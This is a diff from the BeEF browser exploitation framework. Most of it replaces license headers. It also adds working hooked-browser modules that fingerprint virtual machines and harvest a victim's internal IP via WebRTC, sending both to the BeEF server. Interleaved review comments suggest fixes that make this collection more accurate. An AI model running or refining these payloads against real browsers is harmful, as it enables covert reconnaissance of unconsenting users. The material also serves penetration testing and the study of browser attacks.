b/modules/host/detect_cups/command.js index e05d44658..ce2c440cb 100644 --- a/modules/host/detect_cups/command.js +++ b/modules/host/detect_cups/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Not Installed"; diff --git a/modules/host/detect_cups/config.yaml b/modules/host/detect_cups/config.yaml index 9b14c62f1..a50398823 100644 --- a/modules/host/detect_cups/config.yaml +++ b/modules/host/detect_cups/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb index a2cef67a4..2e3a87769 100644 --- a/modules/host/detect_cups/module.rb +++ b/modules/host/detect_cups/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_cups < BeEF::Core::Command diff --git a/modules/host/detect_google_desktop/command.js b/modules/host/detect_google_desktop/command.js index 428db53e0..2a22e8f3b 100644 --- a/modules/host/detect_google_desktop/command.js +++ b/modules/host/detect_google_desktop/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dom = document.createElement('b'); diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml index ba611bf45..5f4a721e9 100644 --- a/modules/host/detect_google_desktop/config.yaml +++ b/modules/host/detect_google_desktop/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/host/detect_google_desktop/module.rb b/modules/host/detect_google_desktop/module.rb index cadf07b80..178784cb2 100644 --- a/modules/host/detect_google_desktop/module.rb +++ b/modules/host/detect_google_desktop/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_google_desktop < BeEF::Core::Command diff --git a/modules/host/detect_protocol_handlers/command.js b/modules/host/detect_protocol_handlers/command.js index 90246fba2..e1a52f4a4 100644 --- a/modules/host/detect_protocol_handlers/command.js +++ b/modules/host/detect_protocol_handlers/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // Initialize diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml index a3de123a2..221723dd7 100644 --- a/modules/host/detect_protocol_handlers/config.yaml +++ b/modules/host/detect_protocol_handlers/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb index 13a295ac1..a9041d1d0 100644 --- a/modules/host/detect_protocol_handlers/module.rb +++ b/modules/host/detect_protocol_handlers/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Some additional protocol handlers # # ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js index 5abaac7a5..4a14e28ed 100644 --- a/modules/host/detect_software/command.js +++ b/modules/host/detect_software/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var files = [ diff --git a/modules/host/detect_software/config.yaml b/modules/host/detect_software/config.yaml index 4a0ff900c..90ff29f0d 100644 --- a/modules/host/detect_software/config.yaml +++ b/modules/host/detect_software/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb index df587f431..e1a0a2e9a 100644 --- a/modules/host/detect_software/module.rb +++ b/modules/host/detect_software/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_software < BeEF::Core::Command diff --git a/modules/host/detect_vm/command.js b/modules/host/detect_vm/command.js new file mode 100644 index 000000000..04b2d7b34 --- /dev/null +++ b/modules/host/detect_vm/command.js 
@@ -0,0 +1,64 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Written by Jeremiah Grossman
+// Ported to BeEF by bcoles
+// For more information see http://jeremiahgrossman.blogspot.com.au/2009/08/web-pages-detecting-virtualized.html
+
+beef.execute(function() {
+
+ var result;
+ var dimensions = {
+ '320, 200' : '',
+ '320, 240' : '',
+ '320, 480' : '', // iPhone 4S and earlier
+ '480, 320' : '', // iPhone 4S and earlier
+ '640, 480' : '',
+ '640, 1136' : '', // iPhone 5
+ '800, 480' : '',
+ '768, 576' : '',
+ '854, 480' : '',
+ '1024, 600' : '',
+ '1136, 640' : '', // iPhone 5
+ '1152, 768' : '',
+ '800, 600' : '',
+ '1024, 768' : '',
+ '1280, 854' : '',
+ '1280, 960' : '',
+ '1280, 1024' : '',
+ '1280, 720' : '',
+ '1280, 768' : '',
+ '1366, 768' : '',
+ '1280, 800' : '',
+ '1440, 900' : '',
+ '1440, 960' : '',
+ '1400, 1050' : '',
+ '1600, 1200' : '',
+ '2048, 1536' : '',
+ '1680, 1050' : '',
+ '1920, 1080' : '',
+ '2048, 1080' : '',
+ '1920, 1200' : '',
+ '2560, 1600' : '',
+ '2560, 2048' : ''
+ };
+
+ var wh = screen.width + ", " + screen.height;
+
+ if (dimensions[wh] != undefined) {
+ result = "Not virtualized";
+ } else if (beef.hardware.isVirtualMachine()) {
+ result = "Virtualized";
+ } else if (beef.hardware.isMobilePhone()) {
+ result = "Not virtualized";
+ } else {
+ result = "This host is virtualized or uses an unrecognized screen resolution";
+ }
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result+"&w="+screen.width+"&h="+screen.height);
+
+});
+
diff --git a/modules/host/detect_vm/config.yaml b/modules/host/detect_vm/config.yaml
new file mode 100644
index 000000000..3ed890562
--- /dev/null
+++ b/modules/host/detect_vm/config.yaml
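Review bot: In the new command.js the resolution whitelist is consulted before `beef.hardware.isVirtualMachine()`, so a hooked VM whose screen is one of the listed sizes (800x600 and 1024x768 are both in `dimensions` and are typical guest defaults) is reported as "Not virtualized" and the hardware check never runs. Test the explicit VM signal first and fall back to the resolution table only when it says nothing. `isVirtualMachine()` and `isMobilePhone()` are defined outside this hunk, so treating them as the stronger signal is an assumption to confirm, but the module's own config text already concedes that the resolution heuristic produces false negatives.
```javascript
  var wh = screen.width + ", " + screen.height;

  if (beef.hardware.isVirtualMachine()) {
    result = "Virtualized";
  } else if (dimensions[wh] != undefined || beef.hardware.isMobilePhone()) {
    result = "Not virtualized";
  } else {
    result = "This host is virtualized or uses an unrecognized screen resolution";
  }
  // … unchanged: beef.net.send() of result, w and h …
```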
@@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_virtualization: + enable: true + category: "Host" + name: "Detect Virtual Machine" + description: "This module uses the host screen resolution as a cheap and easy method to check if the browser is running in a virtual environment.

Unusual screen resolutions, such as those used by wide screen televisions or hand-held devices, may result in false negative results." + authors: ["Jeremiah Grossman", "bcoles"] + target: + working: ["All"] diff --git a/modules/host/detect_vm/module.rb b/modules/host/detect_vm/module.rb new file mode 100644 index 000000000..590de2f66 --- /dev/null +++ b/modules/host/detect_vm/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_virtualization < BeEF::Core::Command + + def post_execute + content = {} + content['result'] = @datastore['result'] if not @datastore['result'].nil? + save content + end + +end diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js index 9d207c1d1..b6b9361f4 100755 --- a/modules/host/get_internal_ip/command.js +++ b/modules/host/get_internal_ip/command.js 
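Review bot: `working: ["All"]` in the new detect_vm config.yaml differs in case from the `["ALL"]` used by the other module configs in this diff (zenoss_add_user_csrf, detect_bitdefender2012); if the target matcher compares the string exactly (its implementation is not in this diff), this module would never be marked as working for any browser. Use `working: ["ALL"]` to match the established convention. The same `"All"` spelling appears in get_internal_ip_webrtc's `unknown:` list and deserves the same check.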
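Review bot: `post_execute` in the new detect_vm module.rb persists only `@datastore['result']`, although command.js also posts `w=` and `h=`; dropping them loses the exact resolution that explains an "unrecognized screen resolution" verdict, which is the one case an operator would want to inspect. Save them alongside the verdict: `content['width'] = @datastore['w'] unless @datastore['w'].nil?` and `content['height'] = @datastore['h'] unless @datastore['h'].nil?`.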
@@ -1,21 +1,12 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/'; + var applet_uri = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/'; var internal_counter = 0; var timeout = 30; var output; diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml index 68a4d63c3..19f6a8175 100755 --- a/modules/host/get_internal_ip/config.yaml +++ b/modules/host/get_internal_ip/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java index 2882d1de1..38a0589b5 100755 --- a/modules/host/get_internal_ip/get_internal_ip.java +++ b/modules/host/get_internal_ip/get_internal_ip.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.applet.Applet; import java.applet.AppletContext; import java.net.InetAddress; diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb index cb950806a..37c8f9407 100755 --- a/modules/host/get_internal_ip/module.rb +++ b/modules/host/get_internal_ip/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_internal_ip < BeEF::Core::Command diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js new file mode 100755 index 000000000..e5f663ba9 --- /dev/null +++ b/modules/host/get_internal_ip_webrtc/command.js 
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
+
+ if (RTCPeerConnection) (function () {
+
+ var addrs = Object.create(null);
+ addrs["0.0.0.0"] = false;
+
+ // Establish a connection with ICE / relay servers - in this instance: NONE
+ var rtc = new RTCPeerConnection({iceServers:[]});
+ if (window.mozRTCPeerConnection) { // FF needs a channel/stream to proceed
+ rtc.createDataChannel('', {reliable:false});
+ };
+
+ // Upon an ICE candidate being found
+ // Grep the SDP data for IP address data
+ rtc.onicecandidate = function (evt) {
+ if (evt.candidate) grepSDP(evt.candidate.candidate);
+ };
+
+ // Create an SDP offer
+ rtc.createOffer(function (offerDesc) {
+ grepSDP(offerDesc.sdp);
+ rtc.setLocalDescription(offerDesc);
+ }, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); });
+
+ function processIPs(newAddr) {
+ if (newAddr in addrs) return;
+ else addrs[newAddr] = true;
+ var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps "));
+ }
+
+ function grepSDP(sdp) {
+ var hosts = [];
+ sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
+ if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.13
+ var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1
+ addr = parts[4],
+ type = parts[7];
+ if (type === 'host') processIPs(addr);
+ } else if (~line.indexOf("c=")) { // http://tools.ietf.org/html/rfc4566#section-5.7
+ var parts = line.split(' '),
+ addr = parts[2];
+ processIPs(addr);
+ }
+ });
+ }
+ })(); else {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "Browser doesn't appear to support RTCPeerConnection");
+ }
+
+});
diff --git a/modules/host/get_internal_ip_webrtc/config.yaml b/modules/host/get_internal_ip_webrtc/config.yaml
new file mode 100755
index 000000000..53b964e01
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ get_internal_ip_webrtc:
+ enable: true
+ category: "Host"
+ name: "Get Internal IP WebRTC"
+ description: "Retrieve the internal (behind NAT) IP address of the victim machine using WebRTC Peer-to-Peer connection framework. Code from http://net.ipcalf.com/"
+ authors: ["xntrik", "@natevw"]
+ target:
+ working: ["C", "FF"]
+ unknown: ["All"]
diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb
new file mode 100755
index 000000000..3f501683a
--- /dev/null
+++ b/modules/host/get_internal_ip_webrtc/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_internal_ip_webrtc < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+
+end
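Review bot: The three `beef.net.send()` calls in the new get_internal_ip_webrtc command.js post bare strings (`"IP is " + ...`, `"SDP Offer Failed"`, `"Browser doesn't appear to support RTCPeerConnection"`) with no `result=` key, while the module.rb added in the same commit reads `@datastore['result']`; every other module in this diff sends `key=value` pairs (`bitdefender=Installed`, `"result="+result`), so unless beef.net.send special-cases keyless payloads (not visible here) the saved `Result` will be empty. Prefix each payload, e.g. `"result=IP is " + displayAddrs.join(" or perhaps ")`, `"result=SDP Offer Failed"` and `"result=Browser doesn't appear to support RTCPeerConnection"`. `processIPs` also fires a send for every newly discovered address, so the server receives a series of partial results instead of one; and `var hosts = []` in `grepSDP` is never used and should be dropped.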
diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js index 9fb382db4..4baf94a9d 100755 --- a/modules/host/get_physical_location/command.js +++ b/modules/host/get_physical_location/command.js @@ -1,20 +1,11 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar'; + var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar'; var applet_id = '<%= @applet_id %>'; var applet_name = '<%= @applet_name %>'; var output; diff --git a/modules/host/get_physical_location/config.yaml b/modules/host/get_physical_location/config.yaml index afbb27215..6c993b22a 100755 --- a/modules/host/get_physical_location/config.yaml +++ b/modules/host/get_physical_location/config.yaml 
@@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + beef: module: get_physical_location: diff --git a/modules/host/get_physical_location/getGPSLocation.java b/modules/host/get_physical_location/getGPSLocation.java index 0a1fb02ad..3b9cb3178 100755 --- a/modules/host/get_physical_location/getGPSLocation.java +++ b/modules/host/get_physical_location/getGPSLocation.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.io.*; import java.util.*; import java.net.*; diff --git a/modules/host/get_physical_location/module.rb b/modules/host/get_physical_location/module.rb index 17f4723fb..6b23e165d 100755 --- a/modules/host/get_physical_location/module.rb +++ b/modules/host/get_physical_location/module.rb 
@@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + require 'rubygems' require 'json' require 'open-uri' diff --git a/modules/host/get_registry_keys/command.js b/modules/host/get_registry_keys/command.js index df90099bc..dfe782faa 100644 --- a/modules/host/get_registry_keys/command.js +++ b/modules/host/get_registry_keys/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var internal_counter = 0; 
diff --git a/modules/host/get_registry_keys/config.yaml b/modules/host/get_registry_keys/config.yaml index fda7b3d7a..bb9a9554d 100644 --- a/modules/host/get_registry_keys/config.yaml +++ b/modules/host/get_registry_keys/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb index 07d4e4d17..40fc5a324 100644 --- a/modules/host/get_registry_keys/module.rb +++ b/modules/host/get_registry_keys/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_registry_keys < BeEF::Core::Command diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js index 9eea6fb32..03fc0ae21 100644 --- a/modules/host/get_system_info/command.js +++ b/modules/host/get_system_info/command.js 
